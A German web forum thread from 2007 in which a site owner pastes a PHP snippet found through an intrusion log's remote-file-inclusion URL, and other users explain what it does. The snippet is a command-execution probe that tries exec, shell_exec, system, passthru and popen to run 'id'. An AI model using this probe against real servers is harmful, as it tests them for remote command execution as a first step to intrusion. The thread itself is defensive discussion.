Startseite · Features · Forum · Downloads · Weblinks · Dokus/Artikel · FAQ · Impressum
Navigation
Startseite Startseite
Forum Forum
Downloads Downloads
Weblinks Weblinks
Dokus/Artikel Dokus/Artikel
Kontakt Kontakt
FAQ FAQ
Sicherheitskatalog Sicherheitskatalog
Suche Suche
Informationen
Credits Credits
Forenregeln Forenregeln
Team Team
RSS Feeds RSS Feeds
Service
JavaScript Optimierung JavaScript Optimierung
Event Calendar Event Calendar
 
Surftips
Bürobedarf
IonCube Encoder

 
Downloads
Neue Downloads
> Greystar
> The Player BSF ...
> Mp3-Player
> Lewitz-Red II
> PD-Stats-Panel ...
 
Top 5 Downloads
> Security System [10040]
> BS-Fusion [4442]
> Kontaktformular [2569]
> BS Register [1889]
> BS Custom Page ... [1759]
 
Unterstützt BS-Fusion
Spendenmöglichkeiten
Handy:
 € 
Telefon:
 € 
OnlineBanking:
 € 
 
BS-Fusion Deutschland > Support - Eigene Infusionen
->> Security System
->> Hackversuch
Benutzername
 Passwort

Registrieren
Forumsuche
Forumregeln
 
Vorheriges Thema Nächstes Thema

Durchsuche Thema
Autor
Hackversuch   15.11.2007 17:31 #1 top
butzen-hb
Noob




Beiträge: 7
Eingetreten: 13.09.06
Status: Offline
Moin zusammen.
Habe ja ( wem auch immer sei Dank) das Secure auf unserer HP www.sgs-torfteufel.de .
Habe mir mal so eine Adresse aus dem Logfile (welches reichlich gefüllt ist) kopiert und bin auf die Seite gegangen http://www.madinaedu.gov.sa/safeon.txt??. Folgendes prangte dort :
( Ich weiss, dass es sich um auführbaren Code handeln muss - weiss aber mangels PHP-Kenntnisse nicht was er bewirken soll. Vielleicht kann mir das einer von Euch verraten ???)

******Es folgt jetzt der Text der auf dieser Page zu sehen ist

<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec'){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'){
$res = @shell_exec($cfe);
}
elseif(function_exists('system'){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

********** Ende Text
 
Autor
RE: Hackversuch   19.11.2007 18:28 #2 top
butzen-hb
Noob



Threadstarter

Beiträge: 7
Eingetreten: 13.09.06
Status: Offline
Danke slaughter.
So ganz befriedigend ist die Antwort dennoch nicht.
Ich weiss immer noch nicht was es denn bewirkt, was nach deiner Meinung keinen Schaden anrichten kann.
 
Autor
RE: Hackversuch   19.11.2007 21:20 #3 top
gozoc
Co-Admin u. Cheftester


User Avatar



Beiträge: 1046
Ort: Bayern
Eingetreten: 22.09.06
Status: Offline
Die Befehle exec und shell_exec (als Beispiel) sind Versuche direkt auf Linux Befehle der Kommandozeile zu wirken ...
was aber bei den meisten, vernünftig eingestellten Linux Servern so nicht möglich ist.
http://www.wuschelkiste.de/fusion/
 
Autor
RE: Hackversuch   19.11.2007 21:26 #4 top
butzen-hb
Noob



Threadstarter

Beiträge: 7
Eingetreten: 13.09.06
Status: Offline
Danke gozoc.
Danke slaughter.
Thread kann geschlossen werden
 
Springe zu Forum:
 
Ähnliche Themen wie "Hackversuch" [5]
Thema Forum Antworten Letzter Beitrag
anzeige der hackversuche Security System 7 01.12.2009 21:33 von Anaconda
Hackversuch Teil 3 Security System 6 30.10.2008 23:08 von Phoenix1
Hackversuche Teil2 Security System 8 16.09.2008 19:53 von Inf3rn4l
Hackversuch Fragen Security System 2 28.03.2007 16:04 von VREcki
Hackversuch Security System 1 28.09.2006 22:43 von Silvermoon
Thema verlinken
URL:
BB-Code:
HTML:
© COMBRIX CMS Software v1.01.2
render time: 0.235 sec.		1,972,724 eindeutige Besuche 
blue-Fusion Theme created by Silvermoon
Redesign_160x600